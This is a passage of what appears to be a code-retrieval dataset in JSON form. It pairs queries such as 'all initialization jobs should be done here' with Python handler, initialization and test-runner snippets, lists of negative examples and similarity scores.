data['event_ts']\n channel = data['channel']\n process_data({'user': user, 'message': message, 'message_id': message_id, 'channel': channel, 'time': time})\n except KeyError:\n pass\n except Exception as e:\n logging.error(e)\n return None", "def on_message(self, message):\n obj = json_decode(message)\n self.writing_logs(obj)\n return", "def onMessage(self, msg, binary):\r\n self._assembler.processMessage(msg, binary)", "def onMessage(self, msg):\n log.msg(str(msg))", "def send(self, event, message):\n pass", "def receive_message(self, context, message):\r\n pass", "def SendMessage(self, event):\n pass", "def process(self, msg):\n print \"HANDLER: received a msg: %s\" % msg", "async def websocket_receive(self, event):\n data_received = event.get('text')\n if not data_received:\n return\n\n data = json.loads(data_received)\n message = data['message']\n\n await self.new_message(message)", "def onMessage(self, payload, isBinary):", "def handle_message(self, message):\n\n\t\tself.console.handle_message(message)", "def eventInCallback(self, msg):\n rospy.loginfo(\"event_in msg received\")\n self.event_in = msg.data", "def on_message(self, event):\n event_data = EventData(message=event)\n if self._callback:\n self._callback(event_data)\n self.offset = event_data.offset\n return event_data", "def on_message(self, msg):\n self.log.info(msg)", "def on_message(self, userdata, message):\n logging.debug(f\"Message arrived from {message.topic}\")\n self.process(userdata, message)", "def on_message(self, ws, message):\n message = json.loads(message)\n if message['type'] == 'error':\n self.on_error(None, message['message'])\n elif message['type'] == 'subscriptions':\n print(\"Subscribed to {}\".format(', '.join([ channel['name'] for channel in message['channels'] ])))\n else:\n if ((message['type']=='ticker' and message['product_id'] in self._ticker) or \n (message['type'] in [\"snapshot\", \"l2update\"] and message['product_id'] in self._level2) or \n (message['type'] in [\"received\",\"open\",\"done\",\"match\",\"change\",\"activate\"] )):\n self.messages.append(message)\n elif message['type']=='heartbeat':\n self.updated_time = time.time()", "def receive_event(self):\n msg = self.msg_queue.get()\n\n # get the logical clock time of the machine that sent the message\n other_system_clock = msg[msg.index(\":\") + 1:] \n \n # set the clock time to the maximum of self's clock time and other \n # system's clock time\n self.clock_time = max(self.clock_time, int(other_system_clock))\n\n # increment the logical clock time and log that a message was received\n self.clock_time += 1\n self.log(\" Received message from \" + str(msg[:msg.index(\":\")]) + \n \" with LC time \" + str(msg[msg.index(\":\") + 2:]) + \n \"; messages left to process: \" + str(self.msg_queue.qsize()))", "def onMessage(self, msg, binary):\r\n# print('WebSocket: Received new message from client. '\r\n# '(binary={0})'.format(binary))\r\n\r\n try:\r\n self._assembler.processMessage(msg, binary)\r\n except InvalidRequest as e:\r\n self.sendErrorMessage('Invalid Request: {0}'.format(e))\r\n except DeadConnection:\r\n self.sendErrorMessage('Dead Connection')\r\n self.dropConnection()\r\n except:\r\n import traceback\r\n traceback.print_exc()\r\n self.sendErrorMessage('Fatal Error')", "def on_message(self, _, message):\n with self.message_lock:\n self.messages.append(Message.deserialize(message))\n self.new_message_available.set()\n super().on_message(_, message)", "def received(self, message):\n raise NotImplementedError()", "async def on_message(self, msg: Message):\n try:\n cmsg = await WechatyMessage(msg)\n except NotImplementedError as e:\n logger.debug(\"[WX] {}\".format(e))\n return\n except Exception as e:\n logger.exception(\"[WX] {}\".format(e))\n return\n logger.debug(\"[WX] message:{}\".format(cmsg))\n room = msg.room() # 获取消息来自的群聊. 如果消息不是来自群聊, 则返回None\n isgroup = room is not None\n ctype = cmsg.ctype\n context = self._compose_context(ctype, cmsg.content, isgroup=isgroup, msg=cmsg)\n if context:\n logger.info(\"[WX] receiveMsg={}, context={}\".format(cmsg, context))\n self.produce(context)", "def handle_message(self, data, channel):\n pass", "def handle_message(self, message):\n print(f\"Got message {message}\")\n if message >> 7 == 1:\n # String\n self.receive_char_array(message)\n elif message >> 3 == 0b00000:\n # Servo position\n self.receive_servo_position(message)\n elif message == 0b00001000:\n # All servo positions\n self.receive_all_servo_positions()\n elif message == 0b00001001:\n # All servo limits\n self.receive_all_servo_limits()\n elif message == 0b00001010:\n # Raw force reading\n self.receive_raw_force()\n print(f\"Handled message {message}\")", "def onMessageBegin(self, isBinary):", "def on_message(self, wsobj, message):\n\n message = json.loads(message)\n\n # If needed, complete the websocket handshake\n if message[\"op\"] == \"C\":\n self.on_open(wsobj, message=message)\n\n # The next few lines ensure only gameplay related event for the\n # specified game are provided. Otherwise, ESPN's websockets include\n # noisy league-wide information.\n elif \"pl\" in message:\n if message[\"pl\"] != \"0\" and message[\"tc\"] == self.channel:\n decoded = self.decode_message(message)\n self.write_message(wsobj, decoded)", "def on_message(self, room: Room, event: Dict) -> None:\n logger.debug(event)\n\n logger.info('stores msg in db')\n self.store_msg(event)\n\n if event['content'].get('msgtype') == 'm.text' and event['sender'] != \\\n self.uid:\n\n # add config to event\n event['config'] = self.config\n\n # gives event to mossbot and watching out for a return message\n msg = MOSS.serve(event)\n\n if msg and msg.data:\n\n if msg.type == 'text':\n logger.info('sending text msg...')\n room.send_text(msg.data)\n\n elif msg.type == 'notice':\n logger.info('sending notice msg...')\n room.send_notice(msg.data)\n\n elif msg.type == 'html':\n logger.info('sending html msg...')\n room.send_html(msg.data)\n\n elif msg.type == 'image':\n logger.info('sending image msg...')\n self.write_media('image', room, msg.data)\n\n else:\n logger.error(\n 'could not recognize msg type \"%s\"',\n msg[0]\n )\n\n elif msg and msg.type == 'skip':\n logger.info('skipping msg...')\n\n else:\n logger.debug('no matching in event')", "def on_message(self, msg) -> None:\n\n decoded_msg = json.loads(msg)\n message_type = decoded_msg[\"type\"]\n\n if message_type == MSG_SUBCRIPTIONS:\n\n product_ids = decoded_msg[\"channels\"]\n logging.debug(\"Subscriptions: {}\".format(product_ids))\n\n elif message_type == MSG_SNAPSHOT:\n\n product_id = decoded_msg[\"product_id\"]\n self._snapshot(decoded_msg)\n\n # Old best bid and ask doesn't exist yet, this will always set a new bbo\n self.set_if_new_bbo(product_id)\n\n elif message_type == MSG_L2UPDATE:\n\n product_id = decoded_msg[\"product_id\"]\n self.update(decoded_msg)\n\n self.set_if_new_bbo(product_id)\n\n self.event_count += 1", "def on_message(ws, msg):\n data = json.loads(msg)\n if \"results\" in data:\n # This prints out the current fragment that we are working on\n text = data['results'][0]['alternatives'][0]['transcript'].lower()\n print(text)\n # Pass it to the callback\n if CALLBACK(text):\n # If it recognized something, stop listening\n global RUNNING\n RUNNING = False", "def callback_botmessage(self, message):\n pass", "def callback_botmessage(self, message):\n pass", "def callback_botmessage(self, message):\n pass", "def on_message(\n self, client: mqtt.Client, userdata: typing.Any, msg: mqtt.MQTTMessage\n ) -> None:\n self.msgs.append(msg)", "def receiveMessage(self, user, message):\n pass", "def _r_on_incoming_message(self, string, protocol):\n #print(\"Incoming: %s\" % string)\n d = threads.deferToThread(parse_message_string, string)\n d.addCallback(self._r_handle_message_contents, protocol)", "def receive_message(self, message):\r\n self.state.receive_message(message)\r\n return", "def onMessageReceived(self, inputString):\n return", "def _messageReceived(self, message):\n topic = message[0]\n message = message[1:]\n self.messageReceived(message, topic)", "def on_message(ws, message):\n ts = time.time()\n st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n message_dict = message_to_dict(message)\n print('[' + st + '] Event in channel: ' + message_dict['channel'] +\n '. Created by user: ' + message_dict['user'] + '. Event Type: ' +\n str(message_dict['type']) + '.')\n handle_response(message_dict)", "def handle_message(self, data):\n message = Message.from_text(data)\n if message is not None:\n print(message.username, message.action, message.channel, message.content)\n self._callback(\"message\", message) # TODO: add additional callbacks", "def _on_mqtt_message(\n self, client: mqtt.Client, userdata: str, message: mqtt.MQTTMessage\n ) -> None:\n self.log.debug(f\"Received message on topic: {message.topic}\")\n self.inbound_message_listener(Message(message.topic, message.payload))", "def messageReceived(self, message):\n raise NotImplementedError(self)", "def on_msg(self, callback, remove=False):\n self._msg_callbacks.register_callback(callback, remove=remove)", "async def chat_message(self, event):\n message = event['message']\n await self.send_json({\n 'message': message\n })", "def on_watch_message(self, bus, msg):\n msg_struct = msg.get_structure()\n if msg_struct:\n if msg_struct.get_name() == 'GstMessageTag':\n codec_name = ((msg_struct[\"taglist\"].nth_tag_name(0)))\n codec_value = msg_struct[\"taglist\"].get_string(codec_name)\n info_name = codec_name\n c_result, info_value = codec_value\n if c_result:\n self.info_handler(info_name, info_value)\n if codec_name == \"video-codec\":\n self.info_handler(codec_name, info_value)\n r_result, width, height = self.get_resolution()\n if r_result:\n info_name = \"resolution\"\n info_value = \"[{}x{}]\".format(width, height)\n self.info_handler(info_name, info_value)\n bus.remove_signal_watch()", "def on_message(self, message):\n\n logger.debug('Data from client (%s)' % message)\n\n # A message string from the client.\n # Encode it and send it to the endpoint server as bytes.\n self.endpoint_stream.write(message.encode('utf-8'))", "def on_message(self, handler: Callable[[Request], Coroutine[Any, Any, Any]]):\n self.on_message_handler = handler", "async def on_chat_message(self, chat_message):\n pass", "def on_bus_message(self, bus, message):\n pass", "def onMessageEnd(self):", "def on_recv(self, callback):\n return self.message_client.on_recv(callback)", "async def event_message(ctx):\n\n # the bot should not react to itself\n if ctx.author.name.lower() == BOT_NICK.lower():\n return\n\n # relay message to command callbacks\n await bot.handle_commands(ctx)", "def process_chatter(self, msg):\n # note, nothing in here is ROS specific, it's just python code that\n # runs when new info appears\n\n print msg.data # print the recieved message\n\n self.msgs_recieved += 1 # increase msg count\n self.msgs_recieved %= 500 # mod 500 so we don't get enormous numbers\n self.msg = \"%d messages recieved\" % self.msgs_recieved # set message", "def _r_handle_message_contents(self, msg, protocol):\n if isinstance(msg, ResponseMessage):\n d = self._waiting_messages.pop(msg.response_to, None)\n if d is not None:\n d.callback(msg)\n elif isinstance(msg, ServerMotdMessage):\n print(\"Connected: %s\" % msg.motd)\n self._r_successful_connection()\n elif isinstance(msg, EventMessage):\n callback = self._event_callbacks.get((msg.service_name, msg.event_name))\n if callback is not None:\n threads.deferToThread(callback, *msg.pargs, **msg.kwargs)", "def handle_msg(self, state_id, msg):\n pass", "def sub_callbackmsg(self, msg):\n\n print (msg.message)\n self.received_msg = self.received_msg + [msg.message]\n print (self.received_msg)", "async def chat_message(self, event):\n await self.send(\n {'type': \"websocket.send\",\n 'text': event['response_data']}\n )", "def processReceivedMessage(iTag, clsName, msgID, msg): #@NoSelf", "def handle_received(self) -> None:\n self.buffer: bytes\n while self.buffer:\n try:\n request, self.buffer = parse_request(self.buffer)\n if request is None:\n _LOGGER.debug(\"Not enough data to parse request on event channel\")\n break\n\n _LOGGER.debug(\"Got message on event channel: %s\", request)\n\n # Send a positive response to satisfy the other end of the channel\n # TODO: Add public method to pyatv.http to format a message\n headers = {\n \"Content-Length\": 0,\n \"Audio-Latency\": 0,\n \"Server\": request.headers.get(\"Server\"),\n \"CSeq\": request.headers.get(\"CSeq\"),\n }\n response = (\n f\"{request.protocol}/{request.version} 200 OK\\r\\n\"\n + \"\\r\\n\".join(f\"{key}: {value}\" for key, value in headers.items())\n + \"\\r\\n\\r\\n\"\n )\n self.send(response.encode(\"utf-8\"))\n except Exception:\n _LOGGER.exception(\"Failed to handle message on event channel\")", "def on_message(self, message):\n # Not expecting any message\n if message is None:\n yield self._close_netconf()", "def onMessage(self):\n \"\"\"\n Validates that the received message is from a student and then broadcasts the message to the rest of the class.\n\n @param self: self is the instance of this object.\n @param message: the message that is received\n @param student: the student that sent the message\n \"\"\"\n pass", "async def on_socket_receive(self, msg: \"Msg | MsgProto\") -> None:", "def handle(self, message):\n for callback in self.callbacks:\n callback(message['data'])" ]
[ "0.8410868", "0.8254583", "0.7882204", "0.78618526", "0.7829602", "0.7802724", "0.773378", "0.7572389", "0.7512617", "0.74960405", "0.74841064", "0.74824226", "0.7457746", "0.7441775", "0.74085176", "0.73933196", "0.7379106", "0.7322716", "0.7322716", "0.730575", "0.729197", "0.729197", "0.7284595", "0.72838116", "0.72606355", "0.72436965", "0.7213562", "0.71948355", "0.71827555", "0.71697366", "0.7160725", "0.71404606", "0.70883834", "0.70781153", "0.70545596", "0.7035821", "0.7030046", "0.7030046", "0.7021371", "0.697039", "0.6944535", "0.6940851", "0.6920974", "0.69166934", "0.69108754", "0.69102657", "0.69082093", "0.68999183", "0.6898014", "0.68911606", "0.6887734", "0.68729603", "0.6863757", "0.6859718", "0.6853219", "0.68373764", "0.6832846", "0.68239325", "0.6817295", "0.68061733", "0.6802602", "0.67969847", "0.6794432", "0.67941475", "0.6787541", "0.67614484", "0.6761284", "0.6749756", "0.6749756", "0.6749756", "0.6733205", "0.67207634", "0.6694453", "0.6689608", "0.6682256", "0.6673972", "0.6661941", "0.6643456", "0.66421777", "0.66399395", "0.6635076", "0.6633131", "0.66217536", "0.6612692", "0.66111106", "0.6608964", "0.66087776", "0.65951335", "0.65847594", "0.6583949", "0.65721256", "0.6571512", "0.6568762", "0.6565291", "0.6559426", "0.65575755", "0.655179", "0.65497774", "0.6546588", "0.65455425", "0.6541651" ]
0.0
-1
all initialization jobs should be done here.
async def on_ready(self, payload: EventReadyPayload): log.info('ready event <%s>', payload) # 1. get all of friends friends: List[Contact] = await self.Contact.find_all() for friend in friends: log.info('load friend<%s>', friend) # 2. get all of rooms rooms: List[Room] = await self.Room.find_all() for room in rooms: log.info('load room<%s>', room)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _initJobs(self):\n pass", "def do_init(self):\n\n pass", "def _initialise_run(self) -> None:", "def initialize():\n manager.initialize()\n logs.exit_great_success()", "def _manually_initialize(self) -> None:\n # XXX: maybe refactor, this is actually part of the public interface\n pass", "def _post_init(self):\n pass", "def init():", "def _post_init(self) -> None:\n return", "def _initialize(self):\n self.send_init_command()", "def _real_initialize(self):\n pass", "def _initialize(self):\n pass", "def _initialize(self):\n pass", "def _initialize(self):\n pass", "def _afterInit(self):\n pass", "def post_init(self):\n\t\tpass", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def initialize(self):\n pass # pragma: no cover", "def initialise(self):", "def initialize(self):\n pass", "def initialize(self):\n pass", "def initialize(self):\n pass", "def initialize(self):\n pass", "def initialize(self):\n pass", "def initialise(self):\n self.set_up()", "def startUp(self):\n pass", "def initialize(self):\n\t\tpass", "def ready(self):\n # self.init_es_templete()\n self.init_uwsgi_log()", "def initialize(self):\r\n pass", "def initialize(self):\r\n pass", "def startup(self):\n if self.initialize_mp:\n self.initialize_multiprocessing()\n self.startup_run()\n self.startup_finish()", "def initialise(self):\r\n return", "def initialise(self):\r\n return", "def initialize(self):\n if not self._ready:\n self._real_initialize()\n self._ready = True", "def init_run(self):\n raise NotImplementedError", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def final_init(self, **kwargs):\n # Loading hierarchical settings and creating initial routine\n self.create_initial_routine(load_parameters=False)\n if self.autorun:\n # FIXME: if the init does not finish the object does not exist and\n # the routine results are not accessible\n try:\n self.run()\n self.post_run()\n except:\n log.error(\n \"Autorun failed to fully run, concluded routine steps \"\n \"are stored in the routine_steps attribute.\",\n exc_info=True,\n )", "def initialize(self,init):\n logger.info('*** initialize: worker id=%d',self._agent.wid)\n self.commands = {'initialize':None, 'before_do_work':None, 'after_do_work':None, 'finalize':None}\n self.commands.update(init.get(self._agent.wid,{}))\n exec_command(self.commands['initialize'])", "async def finalize_load(self) -> None:\n await asyncio.gather(_complete_init_tasks(), self.manager.init())", "def initialize(self):\n return", "def setUp(self):\n self.sc = init_orca_context(cores=4)", "async def init(self) -> None:", "async def init(self) -> None:", "def init():\n pass", "async def pre_action_init(self) -> None:", "def _call_initialization(self,\r\n input_fp,\r\n output_dir,\r\n params,\r\n job_prefix,\r\n poll_directly,\r\n suppress_submit_jobs):\r\n pass", "def _initialize_all():\n registry.clear_checkers()\n registry.clear_contexts()\n cli._register_internal_plugins.has_run = ( # pylint: disable=protected-access\n False\n )\n cli._register_internal_plugins() # pylint: disable=protected-access", "def work(self):\n self.config_file = self.args.config\n self.init_config()\n self.init_db()\n\n self.kickoff()", "def initialise(self):\n self.sc.init.exec_action(self.variables)", "async def initialize(self):", "def initialize(self):\n self.population.initialize()\n self.cache.initialize()\n if self.storage:\n self.storage.initialize()", "def user_init(self):\n pass", "def _init(self):\n pass", "def startup(self):\n pass", "def agent_init(self):\n pass", "def startup(self) -> None:", "def initialize(self):", "def initialize(self):", "def initialize(self):", "def initialize(self):", "def init(self):\r\n self._parse_options(self._force_args)\r\n self._maybe_daemonize()\r\n self._setup_modules()\r\n self._state = self.INITIALIZED", "def initialize(self) -> None:\n pass", "def _initialize_runners_startup(self):\n if self.command_group.is_cmd0_runner():\n self._initialize_runner(self.command_group.cmd0)\n if self.command_group.is_cmd1_runner():\n self._initialize_runner(self.command_group.cmd1)\n if self.command_group.is_cmd2_runner():\n self._initialize_runner(self.command_group.cmd2)", "def initialize(self, *args, **kwargs):\n self.initialized = True", "def init_batch(self):\n pass", "async def _setup(self):", "def _init(self, options):\n self._initRuntime(options)\n self._loadConfig() # needs runtime\n self._initGeneral() # needs _config\n self._initGroups() # needs _config and general", "def __init__(self):\n self._initialized = False\n self.init()", "def __init__(self):\n self._initialized = False\n self.init()", "def on_worker_init(self):\n self.import_default_modules()\n\n self.close_database()\n self.close_cache()", "def pre_init(self) -> None:\n self._check_and_set_network()\n self._check_and_apply_migrations()", "async def _init(self, **kwargs):", "def init(self) -> None:\n ...", "def _setup(self) -> None:\n\t\treturn", "def _child_init(self):\n self._create_init_gp()", "def initialization_step(self):\n # Update where agents are\n self.update_agent_location_vector()\n # update task locations\n self.update_task_location_vector()\n # update deadlines\n self.populate_deadline_vector()\n # update distances to each task and orientation to each task\n self.update_agent_distances_vector()\n self.update_agent_orientation_vector()", "def on_initialize(self) -> None:\n pass", "def on_init_start(self):\n for callback in self.callbacks:\n callback.on_init_start(self)", "def initService(self):", "def _initJobs(self):\n assert not hasattr(self, 'jobs'), '_initJobs should only be called once'\n\n conf = self.config.container_manager\n self.jobs = []\n\n job1 = LoopingCall(self.updateOurContainer)\n job1.start(float(conf.updateoursd_interval))\n self.jobs.append(job1)\n\n job2 = LoopingCall(self.retrieveContainer)\n job2.start(float(conf.retrievesd_interval))\n self.jobs.append(job2)\n\n job3 = LoopingCall(self.relationshipRedemption)\n job3.start(float(conf.redemption_hours))\n self.jobs.append(job3)", "def init(self):", "def init(self):", "def bootstrap(self):\n None", "def init_ca(self):\n self._init_dir()\n self._init_serial()\n self._init_keys()", "async def init(self):\n self.base_tamplates = {}\n self.preparing_task = None\n self.app = aioweb.Application()\n self.runner = aioweb.AppRunner(self.app)", "def init(): \n\tset_verbosity()\n\t_set_threads()\n\t_set_heartbeat()\n\t#_set_storage()\n\t\n\tinit_targets()\n\t\n\tsend_heartbeat(start=True)\n\t\n\tinfo_msg = \"init plugin script\"\n\tlogger.info(info_msg)\n\n\tinit_plugin()\n\n\tinfo_msg = \"loaded %s plugin(s)\" %(len(kb.plugins.handle))\n\tlogger.info(info_msg)", "def initialize(self, args):\n\t\tpass", "def _setup(self):\n pass", "def _setup(self):\n pass", "def _setup(self):\n pass", "def _setup(self):\n pass", "def _setup(self):\n pass", "def __init__(self):\n self.setup_called = False", "def _initJobs(self):\n super(DigestManager, self)._initJobs()\n conf = self.config.container_manager\n\n job4 = LoopingCall(self.performRequestedScan)\n job4.start(float(conf.activescan_interval))\n self.jobs.append(job4)", "def __init_on_load__(self):" ]
[ "0.7979565", "0.7962231", "0.7734526", "0.76368004", "0.7622692", "0.7585923", "0.7379355", "0.7354919", "0.73505986", "0.7327622", "0.7325596", "0.7325596", "0.7325596", "0.73226774", "0.7315183", "0.7215203", "0.7204069", "0.7199315", "0.7195699", "0.7195699", "0.7195699", "0.7195699", "0.7195699", "0.7164351", "0.71488863", "0.7142312", "0.7129774", "0.712093", "0.712093", "0.7087286", "0.7081747", "0.7081747", "0.7067055", "0.7059272", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7052354", "0.7050465", "0.70414585", "0.7039609", "0.7029434", "0.701031", "0.6968422", "0.6968422", "0.6962912", "0.69627863", "0.69511366", "0.6949848", "0.6934405", "0.69313174", "0.6926279", "0.6920119", "0.6900095", "0.6891864", "0.68851614", "0.6870643", "0.6869097", "0.68687576", "0.68687576", "0.68687576", "0.68687576", "0.6861655", "0.68559986", "0.6841478", "0.6835739", "0.6825767", "0.68196225", "0.6807382", "0.68065506", "0.68065506", "0.68058753", "0.68025225", "0.68018156", "0.6800936", "0.67964745", "0.67886186", "0.6781493", "0.67709523", "0.67631406", "0.67575604", "0.6747489", "0.67365783", "0.67365783", "0.673502", "0.6729958", "0.6726825", "0.6713302", "0.66918194", "0.668709", "0.668709", "0.668709", "0.668709", "0.668709", "0.6684617", "0.6682519", "0.6677994" ]
0.0
-1
Run all dispatch tests
def dispatch(): suite = ServiceTestSuite() suite.addTest(unittest.makeSuite(Test, 'test_dispatch')) return suite
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def runTests(self):\n \n pass", "def doAllTests(self):\n # Initial offset\n self.getAlertsFile()\n self.offset = self.getOffset(self.config.get('PATHS', 'tempfile'))\n\n # Do all tests\n # As the socket is not persistent, client side attacks have to be done before all tests\n for module in self.modules:\n # Test is performed only if selected in config.cfg\n if self.config.get('TESTS', module[1]) == '1':\n print \"\\n%s\\n------------\" % module[0].upper()\n if module[1]=='clientSideAttacks':\n self.doClientSideAttacksTest( clientSideAttacks.ClientSideAttacks(self._target).getPayloads() )\n# elif module[1]=='multipleFailedLogins':\n# self.doMultipleFailedLoginsTest( multipleFailedLogins.MultipleFailedLogins(self._target).getPayloads() )\n else:\n self.doTest( module[1], eval( ('%s.%s'+'(self._target,self._cnf).getPayloads()') % (module[1], module[1][:1].upper()+module[1][1:]) ) )\n\n # Done!\n print \"\\n\\n-----------------------\"\n print \"DONE. Check the report.\"\n print \"-----------------------\\n\"", "def test_all():\n test_get_to()\n test_error_type()\n test_exchange()\n print(\"All tests passed.\")", "def main():\n run_test_all()", "def run_tests(self):\n raise NotImplementedError", "def runAll():\n\n loader = unittest.TestLoader()\n test_dir = pkg_resources.resource_filename('frvcpy.test','.')\n suite = loader.discover(test_dir)\n\n runner = unittest.TextTestRunner(verbosity=2)\n runner.run(suite)", "def run_tests(self):\n\n # log\n self.logger.debug('\\n\\nExecute test methods:\\n-----------------------------')\n\n # test methods start here\n # ------------------------------------------------------------------\n # ------------------------------------------------------------------\n\n # dummy_method\n self.dummy_method()\n\n # ------------------------------------------------------------------\n # ------------------------------------------------------------------\n # test methods end here\n\n # log\n self.logger.debug('\\n\\n-----------------------------\\nFinished test methods.')", "def run_all_unit_tests(cls):\n suites_list = []\n for test_class in cls.TESTS:\n suite = unittest.TestLoader().loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n result = unittest.TextTestRunner().run(unittest.TestSuite(suites_list))\n if not result.wasSuccessful() or result.errors:\n raise Exception(result)", "def run_all_tests(self):\n for index in range(len(self.__test_set_list)):\n self.run_test(index)", "def run_tests():\n \n test_constructor_positive()\n test_constructor_negative()\n test_game_move_positive()\n test_game_move_negative()\n test_game_move_edge()\n print(\"Congratulations ! You passed all the game test cases.\")", "def run_all(self):\n failures, errors = [], []\n\n # Run each test case registered with us and agglomerate the results.\n for case_ in self.cases:\n case_.run()\n update_results(failures, errors, case_)\n\n # Display our results.\n print_errors(errors)\n print_failures(failures)\n print_overview(errors, failures)\n\n # Exit with 0 if all tests passed, >0 otherwise.\n sys.exit(len(failures) + len(errors))", "def test_all():\n test_prepare_text()\n test_end_chat()\n test_choose_author()\n test_choose_book()", "def run_all_tests():\n remove_dbs()\n run_training_tests()\n run_custom_training_tests()\n run_training_save_tests()\n run_validation_tests()\n run_feature_extraction_tests()", "def execute(self):\n for test in self.tests:\n test.execute()\n self.logger.dump()\n print(\"Finished!\")", "def run(self):\n if self.all:\n cmd = self.apply_options(self.test_all_cmd)\n self.call_and_exit(cmd)\n else:\n cmds = (self.apply_options(self.unit_test_cmd, (\"coverage\",)),)\n if self.coverage:\n cmds += (self.apply_options(self.coverage_cmd),)\n self.call_in_sequence(cmds)", "def tests():", "def RunAll():\n testfunctions = []\n for name, obj in inspect.getmembers(sys.modules[__name__]):\n if inspect.isfunction(obj) and name != 'RunAll':\n testfunctions.append(obj)\n\n # run all the functions\n for f in testfunctions:\n print('Running %s' % str(f))\n f()", "def run_code(self, test):\n for action in test:\n self.assertEquals(1, len(action))\n action_type, action = list(action.items())[0]\n\n if hasattr(self, \"run_\" + action_type):\n getattr(self, \"run_\" + action_type)(action)\n else:\n raise InvalidActionType(action_type)", "def runalltests():\n doctest.testmod()", "def _run_tests(self):\n for pyunit_testcase in self.cfg.testcases:\n yield self._run_testsuite(pyunit_testcase)", "def dispatch():\n suite = ServiceTestSuite()\n suite.addTest(unittest.makeSuite(AmazonTestCase, 'test_dispatch'))\n return suite", "def runtests():\n #- Load all TestCase classes from desistar/test/test_*.py\n tests = desistar_test_suite()\n #- Run them\n unittest.TextTestRunner(verbosity=2).run(tests)", "def run_all_tests(self) -> None:\n self.run_trt_precision_tests()\n logging.info(\"Check analysis result at: %s\", self._output_dir)", "async def run(self):\n print(\"\".join((\"-\" * 8, type(self).__name__, \"-\" * 8)))\n for method_name in dir(self):\n if not method_name.startswith(\"test\"):\n continue\n print(method_name, end=\"... \")\n try:\n await getattr(self, method_name)()\n except AssertionError:\n print(\"FAIL\")\n traceback.print_exception(*sys.exc_info())\n except Exception: # pylint: disable=broad-except\n print(\"ERROR\")\n traceback.print_exception(*sys.exc_info())\n else:\n print(\"PASS\")\n print()", "def runtest(self):", "def collectTests(self, global_ctx):\n pass", "def __main() :\n launchTests()", "def run(self) -> None:\n self.test_sanity()\n if self.has_errors():\n return\n\n tests: List[Callable[[], None]] = [\n self.test_headlines_predefined,\n self.test_headlines_required,\n self.test_headlines_dependencies,\n self.test_headlines_order,\n self.test_headlines_named_entities,\n self.test_named_entities,\n self.test_reading_attributes,\n self.test_forbidden_words,\n self.test_unwanted_words,\n self.test_police_abbreviations,\n self.test_spelling,\n self.test_grammar_rules_regex,\n ]\n\n for test in tests:\n if self.stop_on_error and self.has_errors():\n break\n test()", "def run():\n\tsubsuite_list = []\n\tfor _, modname, _ in pkgutil.iter_modules(test.__path__):\n\t\tif modname.startswith(\"test_\"):\n\t\t\tmodule = importlib.import_module('test.' + modname)\n\t\t\tsubsuite = unittest.TestLoader().loadTestsFromModule(module)\n\t\t\tsubsuite_list.append(subsuite)\n\tsuite = unittest.TestSuite(subsuite_list)\n\n\tprint(\"Testing:\\n\")\n\tunittest.TextTestRunner(verbosity=2).run(suite)", "def test():\n\n tests = unittest.TestLoader().discover('api/tests/', pattern='*/test_*.py')\n unittest.TextTestRunner(verbosity=2).run(tests)", "def tests(context):\n black(context)\n isort(context)\n flake8(context)\n pylint(context)\n yamllint(context)\n pydocstyle(context)\n bandit(context)\n pytest(context)\n\n print(\"All tests have passed!\")", "def actionRunUnitTests():\n UnitTestRunner.init()\n \n for target in Settings.targets:\n for platform in Settings.targetPlatforms:\n for cpu in Settings.targetCPUs:\n for configuration in Settings.targetConfigurations:\n if not Summary.checkIfActionFailed(ACTION_BUILD, target, platform, cpu, configuration):\n Logger.printStartActionMessage('Running unit tests for ' + target + ' ' + platform + ' ' + cpu + ' ' + configuration, ColoredFormatter.YELLOW)\n result = UnitTestRunner.run(target, platform, cpu, configuration)\n Summary.addSummary(ACTION_RUN_UNITTESTS, target, platform, cpu, configuration, result, UnitTestRunner.executionTime)\n if result != NO_ERROR:\n Logger.printEndActionMessage('Failed to execute unit tests!')\n else:\n Logger.printEndActionMessage('Executed all unit tests')", "def run_tests(self):\n with self.report.timer.record(\"run\"):\n self.result.report.extend(self._run_tests())", "def runAllTests():\n\tttr = unittest.TextTestRunner(verbosity=3).run(suite())\n\tnTests = ttr.testsRun + len(ttr.skipped)\n\tprint(\"Report:\")\n\tprint(\"\\t\" + str(len(ttr.failures)) + \"/\" + str(nTests) + \" failed\")\n\tprint(\"\\t\" + str(len(ttr.errors)) + \"/\" + str(nTests) + \" errors\")\n\tprint(\"\\t\" + str(len(ttr.skipped)) + \"/\" + str(nTests) + \" skipped\")", "def test_methods(self):\n\n #log\n self.logger.debug('\\n\\nExecute test methods:\\n-----------------------------')\n\n\n \n #test methods here\n #------------------------------------------------------------------\n\n #dummy_method\n self.dummy_method()\n\n #------------------------------------------------------------------\n\n\n\n #log\n self.logger.debug('\\n\\n-----------------------------\\nFinished test methods.')", "def runTest(self):\n unittest.main()\n ChoreTest.clean_up()", "def test_methods(self):\n\n #log\n self.logger.debug('\\n\\nExecute test methods:\\n-----------------------------')\n\n\n \n #test methods here\n #------------------------------------------------------------------\n\n #dummy_method\n self.dummy_method()\n\n #stylesheet_test\n #self.stylesheet_test(self.wdgt_explanation)\n\n #------------------------------------------------------------------\n\n\n\n #log\n self.logger.debug('\\n\\n-----------------------------\\nFinished test methods.')", "def RunTestAll(ss):\n ss.StopNow = False\n ss.TestAll()\n ss.Stopped()", "def run_tests(tests):\n return [test(t) for t in tests]", "def dispatch():\n app.run()", "def runTest(self):\n\t\tself.setUp()\n\t\tself.test_postopProgramming1()", "def main():\n # add all new test suites per test module here\n suite_date = test_date.suite()\n suite_ng = test_ng.suite()\n suite_page = test_page.suite()\n suite_container = test_container.suite()\n\n # add the suite to be tested here\n alltests = unittest.TestSuite((suite_date,\n suite_ng,\n suite_page,\n suite_container))\n\n # run the suite\n runner = unittest.TextTestRunner()\n runner.run(alltests)", "def __run_test_methods(self):\n for test_method in self.runnable_test_methods():\n\n result = TestResult(test_method)\n test_method.im_self.test_result = result\n\n try:\n self._method_level = True # Flag that we're currently running method-level stuff (rather than class-level)\n\n # run \"on-run\" callbacks. eg/ print out the test 